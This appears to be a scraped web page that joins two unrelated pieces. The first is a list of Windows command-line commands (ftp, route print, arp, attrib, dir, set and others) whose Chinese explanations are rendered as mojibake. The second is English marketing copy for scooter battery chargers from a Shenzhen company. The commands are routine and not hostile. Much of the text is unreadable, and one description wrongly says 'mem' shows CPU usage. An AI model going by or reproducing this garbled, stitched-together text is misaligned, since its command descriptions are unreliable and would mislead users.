ftp ip 端å£ç”¨äºŽä¸Šä¼ 文件至æœåŠ¡å™¨æˆ–进行文件æ“作,默认端å£ä¸º21。bin指用二进制方å¼ä¼ é€ï¼ˆå¯æ‰§è¡Œæ–‡ä»¶è¿›ï¼‰ï¼›é»˜è®¤ä¸ºASCIIæ ¼å¼ä¼ é€(文本文件时)
route print 显示出IP路由,将主è¦æ˜¾ç¤ºç½‘络地å€Network addres,å网掩ç Netmask,网关地å€Gateway addres,接å£åœ°å€Interface
arp 查看和处ç†ARP缓å˜ï¼ŒARP是åå—解æžçš„æ„æ€ï¼Œè´Ÿè´£æŠŠä¸€ä¸ªIP解æžæˆä¸€ä¸ªç‰©ç†æ€§çš„MAC地å€ã€‚arp -a将显示出全部信æ¯
start 程åºå或命令/max 或/min 新开一个新窗å£å¹¶æœ€å¤§åŒ–(最å°åŒ–)è¿è¡ŒæŸç¨‹åºæˆ–命令
mem 查看cpu使用情况
attrib 文件å(目录å) 查看æŸæ–‡ä»¶ï¼ˆç›®å½•ï¼‰çš„属性
attrib 文件å-A -R -S -H 或+A +R +S +H 去掉(æ·»åŠ )æŸæ–‡ä»¶çš„å˜æ¡£ï¼Œåªè¯»ï¼Œç³»ç»Ÿï¼Œéšè—å±žæ€§ï¼›ç”¨ï¼‹åˆ™æ˜¯æ·»åŠ ä¸ºæŸå±žæ€§
dir 查看文件,å‚数:/Q显示文件åŠç›®å½•å±žç³»ç»Ÿå“ªä¸ªç”¨æˆ·ï¼Œ/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
date /t 〠time /t 使用æ¤å‚æ•°å³â€œDATE/Tâ€ã€â€œTIME/Tâ€å°†åªæ˜¾ç¤ºå½“å‰æ—¥æœŸå’Œæ—¶é—´ï¼Œè€Œä¸å¿…输入新日期和时间
set 指定环境å˜é‡å称=è¦æŒ‡æ´¾ç»™å˜é‡çš„å—符设置环境å˜é‡
set 显示当å‰æ‰€æœ‰çš„环境å˜é‡
HIGH QUALITY:Made of only the highest quality materials and built to last! Our chargers are gauranteed to match the original brand name chargers' quality.
EASY TO USE: Simply plug the charger into a wall outlet and then directly into your scooter.
The charger protected: Short circuit protection/ over current protection/ over voltage protection; red light -- charging, green light -- charge OK, it stop automatically when the battery is full. Warm Tips: To avoid the temperature of your charger too high, please do not charge too long.
The shell is made by high-quality plastic, smooth appearance with no impurities. Good safety performance, more reliable for you to use. Red light means charging; Green light means fully charged or disconnect.Aviation Plug Scooter Charger,Power Scooter Charger,Li-Ion Battery Charger
Shenzhen Waweis Technology Co., Ltd. , https://www.waweis.com